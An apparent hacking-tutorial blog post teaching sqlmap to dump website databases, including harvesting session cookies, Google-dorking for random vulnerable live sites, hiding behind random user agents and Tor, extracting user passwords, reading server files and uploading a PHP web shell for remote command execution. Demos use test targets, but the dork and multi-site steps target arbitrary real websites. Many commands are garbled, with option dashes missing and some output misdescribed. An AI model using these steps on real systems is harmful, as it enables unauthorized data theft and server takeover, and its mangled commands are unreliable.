How to dump a database of a website free 2021

Introduction

Hello everyone. We’ve come up with another another topic of  How to dump a database of a website connected to the sqlmap tool. As you may recall, we explained the whole procedures to dump a web application’s database using sqlmap in a prior article, and I believe you should review that article for a better understanding.

However, in this essay, we will go over all of the useful aspects of this application. We assume you’re already familiar with the SQL injection issue, so let’s get right to it.

Let’s take a closer look!!

In a recent article, we discussed how to use Google Dork to discover a web application SQL injection issue. However, we will use the following web application, which was created specifically for penetration testing. We simply added a single quote after the “cat=” option and received a MySQL syntax error, indicating that the web application is vulnerable to SQL injection. 

1
http://testphp.vulnweb.com/listproducts.php?cat=1%27

How to dump a database of a website

How to dump a database of a website free 2021

Our previous article gave you a fast overview of how to utilise SQLite and the various tools it offers. If you’d like to read more about those tools, check out our earlier article. The command to dump the database is as follows. Currently, we’re using testphp.vulnweb.com for demo

Usage 🙂 !! sqlmap -u “<URL>>” –dbs

1
sqlmap u “http://testphp.vulnweb.com/listproducts.php?cat=1” dbs

All of the database’s names that appear in the web app can be seen here.

Dump All

For a complete database listing, use the following command. To use a new feature, simply add it to the command and run it.

Usage !! sqlmap -u “<URL>>” -D < database name > –dump-all –batch

1
sqlmap u “http://testphp.vulnweb.com/listproducts.php?cat=1” D acuart dumpall batch

Done !! The result is in front of you and you can see that it has dumped all the tables in the “acurate” database at once.

Cookies

SQL injection flaws can be found in online applications by connecting to a website and sending “cookies” to sqlmap. If you don’t do this, the flaw won’t be found. This tool is being used to show its abilities with a “DVWA“-compromised web app.
If the web application returns user information after a random number string is typed in, it could be hacked. Let’s take advantage of this chance.
 

Let’s start your burpsuite tool, as it will be critical in obtaining the current user’s cookies. Now intercept the request and copy the highlighted text in its entirety, as shown in the accompanying image.

Go back to the terminal and just add the URL, add the cookie with the copy text and execute the command with the database.

Usage 🙂 !! sqlmap -u “<URL>>” –cookie < cookies > –dbs

1
sqlmap u “http://192.168.21.17/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit#” cookie=“security=low; PHPSESSID=13o5hlkjs3hur2pvnfkgim9t74” dbs

Nice 🙂 !! As you can see it has dumped all the databases after meeting the requirements of this tool.

HTTP Request File

When we use this feature, we will try to dump the whole database into a file called HTTP response. If someone asks, we’ll stop them and write them down in a text file, and use the sqlmap tool to attempt to find and exploit the vulnerability.

After copying the HTTP request, include it in a text file using any tool.

Check the below command which contains the file that we created ourselves and also gave the command to dump the database.

Usage 🙂 !! sqlmap -r < HTTP file > –dbs –dump-all –batch

1
sqlmap r secnhack dbs dumpall batch

After you run the command, you can see that all of the databases in the web application have been wiped out.

Google Dork

We don’t need to run dork on Google on its own because it comes with the sqlmap tool. In order to use this, we only need to add the “G” option in our dork. It will automatically find any websites that are linked to dork and ask us if we want to do sql injection on them.

1
sqlmap g “inurl:”.php?cat=“” dbs

Nice 🙂 !! After selecting the Yes option, it tries to detect the SQL injection vulnerability in the web application and dumped the database if they are vulnerable to SQL injection vulnerability.

Random Agend

Automatically change the user agent after specified period of time to a randomly selected one, thus hiding your real user agent. This will help us in making ourselves anonymous.

1
sqlmap g “inurl:”.php?cat=“” dbs randomagent

Detection

The level tells you how many payloads will be done, and if SQLMap can’t find the injection, the risk should be increased. Both work by default at level 1. You can change the level from 1 to 5 and the risk from 1 to 3.

1
sqlmap r (Site Address) dbs risk=3 level=5

Great 🙂 !! After increasing both the level and the risk, it completely dumps all the databases that exist in the web application.

Dump All

Now if you want to dump all the databases, their tables and columns at once, you can add the “all” option to your command.

1
sqlmap r (Site address) all

That’s Nice 🙂 !! As you can see, even this has dumped the passwords of the users which are stored in the database.

Banner Grabbing

We can get the current version of the database running on the remote host machine by adding “B” option to our command.

1
sqlmap r (site address) b

Nice 🙂 !! Finally it has given us the details of the database running on remote host.

Current User

Some important things to look for when we want to get useful information from a database are the following: Execute the command below to get the list of users in the web application.

1
sqlmap r (site address) currentuser

Current Database

Let us consider the image below in which we have successfully dumped the current available database into a web application.

1
sqlmap r (site address) currentdb

Passwords

If you only want to get the passwords of the users available in the web application, you can add the “password” option to your command.

1
sqlmap r (site address) passwords

Tor Service

Sqlmap provides tor service to make us completely anonymous. However, you can take advantage of this service when you have pre-installed tor in your linux machine.

1
sqlmap r (site address) tor

Multiple Scans

We can perform multiple scans at once time in this tool. But let’s see how it’s possible ? !! So first we will create a file which contains all the URLs that we want to use.

Then we will add the location option of the created file by adding “m” option and try to dump the database.

1
sqlmap m websites.txt dbs

Nice 🙂 !! We finally got the database name of the first web application.

Done 🙂 !! Similarly, we can take help of this facility which will definitely help in saving our time.

Privileges

As we know that privileges means what the user is allowed to do and we can check it by following command.

1
sqlmap r (site address) privileges

Hmm 🙂 !! As you can see what privileges are available to shubham user.

Read Files

Through the following features we can read the sensitive files present in the web application if we have the information of the root folder of the web application.

Usage 🙂 !! sqlmap -r < HTTP File > –file-read=< Location >

1
sqlmap r /root/ fileread=/var/www/html/users.txt

Great 🙂 !! As you can see we have received the sensitive user file without entering the remote host’s database properly.

Upload File

Our malicious php files can now be uploaded, and we can get the entire web server through a tool called sqlmap, which we will show you how to use. The first thing you need to do is make a malicious php file. In our case, we will use the code below to get the cmd shell of the target web server.

1
<?php system($_GET[‘c’]); ?>

Let’s understand the below command, see “–file-write” option in which we have placed our malicious PHP file and see “–file-dest” option in which we add the path of the web server where we are on the target web server Want to upload your php file.

Usage 🙂 !! sqlmap -r < HTTP File > –file-write < Your File > –file-dest < Upload Location > –dbs

1
sqlmap r /root/ filewrite=/root/hack.php filedest=/var/www/html/DVWA/vulnerabilities/sqli/hack.php batch

OMG 🙂 !! Finally our malicious PHP file is successfully uploaded to the target web server and now we can access the web application server’s database through the browser and execute arbitrary commands.

Leave a Reply

Your email address will not be published.